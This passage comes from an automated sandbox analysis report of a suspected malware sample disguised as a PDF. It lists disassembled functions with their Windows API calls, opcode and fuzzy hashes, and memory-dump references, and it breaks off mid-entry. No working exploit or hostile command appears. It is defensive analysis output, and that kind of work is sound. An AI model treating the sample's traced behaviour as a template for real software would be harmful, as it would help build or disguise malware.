                                                                          • Instruction ID: a3a54a688ea6424f55e61200a96e03b8c1890a1be87c9546922a447ff7c6a0a9
                                                                          • Opcode Fuzzy Hash: b43e1c6aff52642442f693a0874e3eaa08e656bb127c4622d487e7f96ef11153
                                                                          • Instruction Fuzzy Hash: 4721A135201601BFEB129F649C41FBAB7EDFF48702F14489AFE1196690EB71D8199BA0
                                                                          Function 00B3E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B3F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00B3E1C4,?,?,?,00B3EFB7,00000000,000000EF,00000119,?,?), ref: 00B3F5BC
                                                                            • Part of subcall function 00B3F5AD: lstrcpyW.KERNEL32(00000000,?,?,00B3E1C4,?,?,?,00B3EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00B3F5E2
                                                                            • Part of subcall function 00B3F5AD: lstrcmpiW.KERNEL32(00000000,?,00B3E1C4,?,?,?,00B3EFB7,00000000,000000EF,00000119,?,?), ref: 00B3F613
                                                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00B3EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00B3E1DD
                                                                          • lstrcpyW.KERNEL32(00000000,?,?,00B3EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00B3E203
                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00B3EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00B3E237
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                          • String ID: cdecl
                                                                          • API String ID: 4031866154-3896280584
                                                                          • Opcode ID: 66e3277ee0f2c49a189c863ac9ff7870b9773a4a6f4af6092515014ecfecdc71
                                                                          • Instruction ID: 2bc4aacc7403d0385bd6e70c2bd8d33622cdad797c3da4738d2b85682a56d787
                                                                          • Opcode Fuzzy Hash: 66e3277ee0f2c49a189c863ac9ff7870b9773a4a6f4af6092515014ecfecdc71
                                                                          • Instruction Fuzzy Hash: 25117C36200246EFCB25AF64DC45A7A77E9FF85350F50406AF816CB2A0EB71D85197A0
                                                                          Function 00B15332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _free.LIBCMT ref: 00B15351
                                                                            • Part of subcall function 00B0594C: __FF_MSGBANNER.LIBCMT ref: 00B05963
                                                                            • Part of subcall function 00B0594C: __NMSG_WRITE.LIBCMT ref: 00B0596A
                                                                            • Part of subcall function 00B0594C: RtlAllocateHeap.NTDLL(01050000,00000000,00000001,00000000,?,?,?,00B01013,?), ref: 00B0598F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap_free
                                                                          • String ID:
                                                                          • API String ID: 614378929-0
                                                                          • Opcode ID: 1dc0530c5d40596932e58a36022c2f1ec80b2852c0b7ac431f3c4f2e1119b589
                                                                          • Instruction ID: 112af60bd330b5efad37ce6e00cf22fd459141d7790801eed3403caa22541a62
                                                                          • Opcode Fuzzy Hash: 1dc0530c5d40596932e58a36022c2f1ec80b2852c0b7ac431f3c4f2e1119b589
                                                                          • Instruction Fuzzy Hash: 0F112B32404A05EFCB312F70BC4569D3BD8AF903E0B6046BAF456D71D0DFB48A809758
                                                                          Function 00AE4531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00AE4560
                                                                            • Part of subcall function 00AE410D: _memset.LIBCMT ref: 00AE418D
                                                                            • Part of subcall function 00AE410D: _wcscpy.LIBCMT ref: 00AE41E1
                                                                            • Part of subcall function 00AE410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AE41F1
                                                                          • KillTimer.USER32(?,00000001,?,?), ref: 00AE45B5
                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AE45C4
                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B1D6CE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                          • String ID:
                                                                          • API String ID: 1378193009-0
                                                                          • Opcode ID: a22c094a71bffb9a857dd9f64cb9b735a0d420ff7f236607b4c2a71ff02f3f79
                                                                          • Instruction ID: 1d676b0e8d2551e128f040a4480d117ad45372cf8ef2a53c8e0bf6c07f48f0f0
                                                                          • Opcode Fuzzy Hash: a22c094a71bffb9a857dd9f64cb9b735a0d420ff7f236607b4c2a71ff02f3f79
                                                                          • Instruction Fuzzy Hash: A521A4B0904794AFEB328B24DC95BFBBBEC9F05308F44009EE69E57281C7B45E849B51
                                                                          Function 00B5667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B47B20,?,?,00000000), ref: 00AE5B8C
                                                                            • Part of subcall function 00AE5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B47B20,?,?,00000000,?,?), ref: 00AE5BB0
                                                                          • gethostbyname.WSOCK32(?,?,?), ref: 00B566AC
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00B566B7
                                                                          • _memmove.LIBCMT ref: 00B566E4
                                                                          • inet_ntoa.WSOCK32(?), ref: 00B566EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                          • String ID:
                                                                          • API String ID: 1504782959-0
                                                                          • Opcode ID: 319298e7f82e7b89aea2533dd5a977f9bca97ffafed963cb59b536d0e1666e5f
                                                                          • Instruction ID: 64dd76a0e3782dfd066717969bcbd9b1bac5394e83fe577d6b18dd5f16c94f9e
                                                                          • Opcode Fuzzy Hash: 319298e7f82e7b89aea2533dd5a977f9bca97ffafed963cb59b536d0e1666e5f
                                                                          • Instruction Fuzzy Hash: B8116035900509AFCB04EBA5EE86DEEB7B8EF48315B1440A5F906A71A1DF70AE04CB61
                                                                          Function 00B39023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00B39043
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B39055
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B3906B
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B39086
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: bc923fea257c710168e751a87ba1695bcd09334a65d7bc7396e3f2133814e421
                                                                          • Instruction ID: 8fc3c433ebc54917c623648ba786a58fc22c8dd28a37e6b77e695a42b272e342
                                                                          • Opcode Fuzzy Hash: bc923fea257c710168e751a87ba1695bcd09334a65d7bc7396e3f2133814e421
                                                                          • Instruction Fuzzy Hash: E5112E79901218FFDB11DFA5CD85EADBBB4FB48710F204095E904B7290D6716E50DB94
                                                                          Function 00AE1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE2612: GetWindowLongW.USER32(?,000000EB), ref: 00AE2623
                                                                          • DefDlgProcW.USER32(?,00000020,?), ref: 00AE12D8
                                                                          • GetClientRect.USER32(?,?), ref: 00B1B84B
                                                                          • GetCursorPos.USER32(?), ref: 00B1B855
                                                                          • ScreenToClient.USER32(?,?), ref: 00B1B860
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 4127811313-0
                                                                          • Opcode ID: c551057a020ed67b37da770552268b385e9952fbd753f248f92bbf2dcde03965
                                                                          • Instruction ID: 7dca236a59ed3cc1f23b626d0ca23c5183f76a6a885bac5386e92b78f7bf8245
                                                                          • Opcode Fuzzy Hash: c551057a020ed67b37da770552268b385e9952fbd753f248f92bbf2dcde03965
                                                                          • Instruction Fuzzy Hash: AE11283590006AABCB00DF95DC859FE77B8FB05300F1004A6FA11E7150CB74BA528BA5
                                                                          Function 00B41652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B401FD,?,00B41250,?,00008000), ref: 00B4166F
                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00B401FD,?,00B41250,?,00008000), ref: 00B41694
                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B401FD,?,00B41250,?,00008000), ref: 00B4169E
                                                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,00B401FD,?,00B41250,?,00008000), ref: 00B416D1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CounterPerformanceQuerySleep
                                                                          • String ID:
                                                                          • API String ID: 2875609808-0
                                                                          • Opcode ID: 97ecf11aebee225ada30420e5eebcfe7d0a3e913fed1d9e86bf20e819e1efaa6
                                                                          • Instruction ID: 2470bcd13c9db3226db277cd06118e18992711576ec26db09e7a9d71b98418f0
                                                                          • Opcode Fuzzy Hash: 97ecf11aebee225ada30420e5eebcfe7d0a3e913fed1d9e86bf20e819e1efaa6
                                                                          • Instruction Fuzzy Hash: DB113031C0151DD7CF009FA9E984AFEBBB8FF09751F064495D940B6180CB749690AB95
                                                                          Function 00B17207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                          • String ID:
                                                                          • API String ID: 3016257755-0
                                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                          • Instruction ID: fe5fb4c47473e8db816b6e24c9bac1773000a4dbbf5a8eff2f6a0eb9acdd3b5a
                                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                          • Instruction Fuzzy Hash: 2501833208414ABBCF125E84DC41CEE3FB2FF2A350B948595FA1856031CA37C9B2AB81
                                                                          Function 00B6B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 00B6B59E
                                                                          • ScreenToClient.USER32(?,?), ref: 00B6B5B6
                                                                          • ScreenToClient.USER32(?,?), ref: 00B6B5DA
                                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B6B5F5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                          • String ID:
                                                                          • API String ID: 357397906-0
                                                                          • Opcode ID: d863e93303c86fded5daac16233debf2eb3440d871c0c93d8a33ecf736aac8c8
                                                                          • Instruction ID: 5469daecd0f32b4b52c115811a33fdc510cf178a81b6e4de7fc20f8cc5486d8f
                                                                          • Opcode Fuzzy Hash: d863e93303c86fded5daac16233debf2eb3440d871c0c93d8a33ecf736aac8c8
                                                                          • Instruction Fuzzy Hash: 331164B5D0020AEFDB01DF99D4449EEBBF9FB18310F104166E915E3260D775AA51CF50
                                                                          Function 00B6B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B6B8FE
                                                                          • _memset.LIBCMT ref: 00B6B90D
                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00BA7F20,00BA7F64), ref: 00B6B93C
                                                                          • CloseHandle.KERNEL32 ref: 00B6B94E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$CloseCreateHandleProcess
                                                                          • String ID:
                                                                          • API String ID: 3277943733-0
                                                                          • Opcode ID: 226e37064d3f91b93836efc34057c3af7621d1bf81ff870883610c7d0ebba3b3
                                                                          • Instruction ID: c321da806bd86b548593c9d52f0d0291935c508b840ea67891ac81121196398c
                                                                          • Opcode Fuzzy Hash: 226e37064d3f91b93836efc34057c3af7621d1bf81ff870883610c7d0ebba3b3
                                                                          • Instruction Fuzzy Hash: 46F0F4B258C3957FE2106765AC4AF7B7ADCDB0A754F004061FA08D62D1EF765A1087A8
                                                                          Function 00B46E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00B46E88
                                                                            • Part of subcall function 00B4794E: _memset.LIBCMT ref: 00B47983
                                                                          • _memmove.LIBCMT ref: 00B46EAB
                                                                          • _memset.LIBCMT ref: 00B46EB8
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00B46EC8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                          • String ID:
                                                                          • API String ID: 48991266-0
                                                                          • Opcode ID: 8aee7bac81a3d7da60c96ed3a085a04e3d4ac3d46ddcf602f7d8e1b0b807fe88
                                                                          • Instruction ID: 1ee9e9d9cda023490a5d297dc34efa06e76e8be079eead73101bcf3e0c3cd3aa
                                                                          • Opcode Fuzzy Hash: 8aee7bac81a3d7da60c96ed3a085a04e3d4ac3d46ddcf602f7d8e1b0b807fe88
                                                                          • Instruction Fuzzy Hash: 57F0543A104210BBCF016F55EC85A59BB69EF45320B0480A1FE085F256CB75A911DBB4
                                                                          Function 00B6C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AE134D
                                                                            • Part of subcall function 00AE12F3: SelectObject.GDI32(?,00000000), ref: 00AE135C
                                                                            • Part of subcall function 00AE12F3: BeginPath.GDI32(?), ref: 00AE1373
                                                                            • Part of subcall function 00AE12F3: SelectObject.GDI32(?,00000000), ref: 00AE139C
                                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B6C030
                                                                          • LineTo.GDI32(00000000,?,?), ref: 00B6C03D
                                                                          • EndPath.GDI32(00000000), ref: 00B6C04D
                                                                          • StrokePath.GDI32(00000000), ref: 00B6C05B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                          • String ID:
                                                                          • API String ID: 1539411459-0
                                                                          • Opcode ID: 87dd5e4ea60c584ce43e04515a6bf92906390de53dd9c60f8e54d2693575b98e
                                                                          • Instruction ID: 9c138d8a6a5b68d71202e8b7bd39d6b53cb24069aa7d9324d6f5c630ccfa64da
                                                                          • Opcode Fuzzy Hash: 87dd5e4ea60c584ce43e04515a6bf92906390de53dd9c60f8e54d2693575b98e
                                                                          • Instruction Fuzzy Hash: D6F0BE3100525ABBDB122F51AC0AFEE3F98AF06310F044011FA11620E28BBD0550CFE5
                                                                          Function 00B3A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B3A399
                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B3A3AC
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00B3A3B3
                                                                          • AttachThreadInput.USER32(00000000), ref: 00B3A3BA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                          • String ID:
                                                                          • API String ID: 2710830443-0
                                                                          • Opcode ID: 23f85a4531b5114d610ee98d583248c7b770aab80b7d0b19688df76eb56a12c2
                                                                          • Instruction ID: 4831b1530dab8663f2a2af69dd35c73df4e941837471dcf4a978cdc3b79a2f3b
                                                                          • Opcode Fuzzy Hash: 23f85a4531b5114d610ee98d583248c7b770aab80b7d0b19688df76eb56a12c2
                                                                          • Instruction Fuzzy Hash: 6DE06D31141328BADB201FA2EC0CEE73F5CFF167A1F108034F508960A0CAB5C540CBA1
                                                                          Function 00AE2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSysColor.USER32(00000008), ref: 00AE2231
                                                                          • SetTextColor.GDI32(?,000000FF), ref: 00AE223B
                                                                          • SetBkMode.GDI32(?,00000001), ref: 00AE2250
                                                                          • GetStockObject.GDI32(00000005), ref: 00AE2258
                                                                          • GetWindowDC.USER32(?,00000000), ref: 00B1C0D3
                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B1C0E0
                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 00B1C0F9
                                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 00B1C112
                                                                          • GetPixel.GDI32(00000000,?,?), ref: 00B1C132
                                                                          • ReleaseDC.USER32(?,00000000), ref: 00B1C13D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                          • String ID:
                                                                          • API String ID: 1946975507-0
                                                                          • Opcode ID: 6461151ac5600d5ceb7ce49ccd0f3668d6d1df2d92e1d8e4673b7049de0659f8
                                                                          • Instruction ID: 62099b0ac864c57e1cb30678e060175d441d1c896474889a5c17a75805b5b185
